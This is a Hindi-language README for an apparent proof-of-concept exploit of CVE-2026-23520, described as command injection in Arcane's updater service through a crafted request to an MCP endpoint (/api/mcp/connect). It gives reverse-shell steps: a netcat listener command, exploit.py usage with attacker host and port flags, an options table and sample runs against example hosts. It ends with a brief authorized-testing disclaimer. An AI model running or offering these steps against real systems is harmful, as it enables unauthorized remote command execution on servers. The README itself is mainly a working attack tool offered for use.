
CVE-2026-23520 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Arcane की अपडेटर सेवा में एक कमांड इंजेक्शन भेद्यता है, जो क्राफ्टेड API अनुरोधों के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाता है।
इस रिपॉजिटरी में एक रिमोट कमांड निष्पादन (RCE) भेद्यता के लिए एक Proof-of-Concept (PoC) एक्सप्लॉइट शामिल है, जो उन एप्लिकेशनों को प्रभावित करती है जो एक असुरक्षित MCP API एंडपॉइंट (आमतौर पर /api/mcp/connect) को उजागर करते हैं।
यह भेद्यता एक क्राफ्टेड API अनुरोध के माध्यम से सिस्टम-स्तरीय कमांड के निष्पादन की अनुमति देती है।
nc -lvnp ATTACKER_PORT
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]
| Argument | Description |
|---|---|
| target | लक्ष्य IP, डोमेन, या URL |
| --lhost | हमलावर IP |
| --lport | हमलावर पोर्ट |
| Flag | Description |
|---|---|
| -p, --port | लक्ष्य पोर्ट (डिफ़ॉल्ट: 443) |
| -s, --scheme | http या https (डिफ़ॉल्ट: https) |
| -e, --endpoint | API एंडपॉइंट पथ |
| -t, --timeout | अनुरोध टाइमआउट |
| -v, --verbose | डीबग आउटपुट |
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
/bin/bash उपलब्ध है।केवल अधिकृत परीक्षण और शैक्षिक उद्देश्यों के लिए।
Parosh B